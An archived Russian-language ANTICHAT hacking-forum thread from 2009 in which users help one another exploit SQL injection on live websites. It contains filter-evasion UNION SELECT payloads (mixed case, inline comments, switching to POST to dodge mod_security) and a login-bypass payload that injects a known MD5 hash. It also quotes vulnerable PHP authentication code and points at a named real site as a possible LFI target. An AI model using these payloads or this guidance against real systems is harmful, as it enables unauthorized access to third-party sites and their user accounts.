ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
09.10.2009, 05:44
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от smtgr
Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?
P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
В зависимости от конкретной ситуации... дай реальный пример...
|
|
|
09.10.2009, 07:16
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от smtgr
Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?
P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
-12/**/ANd/**/1=2/**/uNioN/**/SeLecT/**/1,2,3/*
Попробуй так что ле...
Без пример сложновато 
|
|
|
|
09.10.2009, 15:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 08.04.2008
Сообщений: 286
Провел на форуме:
2375131
Репутация:
1695
|
|
Сообщение от smtgr
Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?
P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
Возможно Apache с mod_security, по обходу, попробуй POST'ом послать.
|
|
|
|
09.10.2009, 15:39
|
|
Новичок
Регистрация: 14.09.2009
Сообщений: 8
Провел на форуме:
21921
Репутация:
4
|
|
Сообщение от smtgr
Доброго времени.
Нашел вроде SQL-inj:
http://site.net/index.php?id=777' - выдает пустую страницу
http://site.net/index.php?id=777+order+by+1/* - отображает корректоно
http://site.net/index.php?id=777+order+by+10/*-снова пусто
Подобрал, 3 столбца. Набираю:
http://site.net /index.php?id=777+and+1=2+union+select+1,2,3/* - вывод отличен от всех предидущих (Forbidden...blablabla).
Похоже на фильтрацию. Какие варианты есть чтобы обойти?
P.s. Сорри если подобный вопрос уже был. Топик очень большой - не прочел еще все
Пробуй вот так
http://site.net/index.php?id=777+union+select+1,2,3/* должно быть корректно, затем подставь -777 и ищи вывод
зачем тебе and+1=2 ?!?!
|
|
|
|
27.09.2009, 23:09
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
Провел на форуме:
7875940
Репутация:
2362
|
|
Сообщение от mailbrush
Есть бажный сайт, при подставке кавычки в авторизацию пишет
Код:
1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' at line 1
select * from customers where customers_email_address='''
[TEP STOP]
Если же пишу ' or 1=1#, в ответ - пароль неверный... ' or 1=1 or customers_email_address!=''# тоже... mailbrush, ты не вкуриваешь логику скрипта) Он сначала достает данные из базы, а уже потом сверяет пароли.
Т.е. там что-то типо такого:
PHP код:
$res = mysql_query("select * from customers where customers_email_address='".$_POST['email']."'");
$item = mysql_fetch_array($res);
if(md5($_POST['password']) == $item['password']) {
echo "LOGINED"!
} else {
echo "FAIL!";
}
Как вариант:
1. Узнать количество столбцов
2. Узнать в каком столбце хранится пароль
3. используя union select вернуть те данные, которые подойдут для успешного логина.
Те:
Если, к примеру, 4 столбца. Пароль в 3м столбце, то запрос на логин должен быть примерно следующий:
login: ' AND 0 UNION SELECT 1,2,'d8578edf8458ce06fbc5bb76a58c5ca4',4--
password: qwerty
__________________
включи голову
|
|
|
|
27.09.2009, 23:19
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от oRb
mailbrush, ты не вкуриваешь логику скрипта) Он сначала достает данные из базы, а уже потом сверяет пароли.
Т.е. там что-то типо такого:
PHP код:
$res = mysql_query("select * from customers where customers_email_address='".$_POST['email']."'");
$item = mysql_fetch_array($res);
if(md5($_POST['password']) == $item['password']) {
echo "LOGINED"!
} else {
echo "FAIL!";
}
Как вариант:
1. Узнать количество столбцов
2. Узнать в каком столбце хранится пароль
3. используя union select вернуть те данные, которые подойдут для успешного логина.
Те:
Если, к примеру, 4 столбца. Пароль в 3м столбце, то запрос на логин должен быть примерно следующий:
login: ' AND 0 UNION SELECT 1,2,'d8578edf8458ce06fbc5bb76a58c5ca4',4--
password: qwerty Точно... Просто привык, что все данные берутся из БД, никогда не встречался с такими скриптами, поэтому и не понял 
|
|
|
|
28.09.2009, 17:10
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от oRb
mailbrush, ты не вкуриваешь логику скрипта) Он сначала достает данные из базы, а уже потом сверяет пароли.
Т.е. там что-то типо такого:
PHP код:
$res = mysql_query("select * from customers where customers_email_address='".$_POST['email']."'");
$item = mysql_fetch_array($res);
if(md5($_POST['password']) == $item['password']) {
echo "LOGINED"!
} else {
echo "FAIL!";
}
Как вариант:
1. Узнать количество столбцов
2. Узнать в каком столбце хранится пароль
3. используя union select вернуть те данные, которые подойдут для успешного логина.
Те:
Если, к примеру, 4 столбца. Пароль в 3м столбце, то запрос на логин должен быть примерно следующий:
login: ' AND 0 UNION SELECT 1,2,'d8578edf8458ce06fbc5bb76a58c5ca4',4--
password: qwerty Как выяснилось, он проверяет еще и мыло. Я зарегался с мылом test@domain.com, паролем password. При вводе
Код:
test@domain.com
password
авторизация успешна, но при вводе
Код:
test@domain.com'#
password
пишет, что пароль неверный.. Значит никак не обойти?
|
|
|
|
28.09.2009, 17:42
|
|
Участник форума
Регистрация: 03.09.2009
Сообщений: 179
Провел на форуме:
1014907
Репутация:
90
|
|
Сообщение от mailbrush
Как выяснилось, он проверяет еще и мыло. Я зарегался с мылом test@domain.com, паролем password. При вводе
Код:
test@domain.com
password
авторизация успешна, но при вводе
Код:
test@domain.com'#
password
пишет, что пароль неверный.. Значит никак не обойти? там может быть двойные кавычки, ещё можно иньекцию на пароле проверить
|
|
|
|
28.09.2009, 02:08
|
|
Познающий
Регистрация: 06.11.2008
Сообщений: 32
Провел на форуме:
934986
Репутация:
21
|
|
Ребят что это за бага? http://www.sys-tema.ru/index.jsp?pk=' (если вообще бага)
|
|
|
|
28.09.2009, 02:15
|
|
Постоянный
Регистрация: 12.05.2009
Сообщений: 395
Провел на форуме:
4761503
Репутация:
229
|
|
Сообщение от Merl00k
Ребят что это за бага? http://www.sys-tema.ru/index.jsp?pk=' (если вообще бага)
Похоже на LFI
Последний раз редактировалось wolmer; 28.09.2009 в 02:21..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид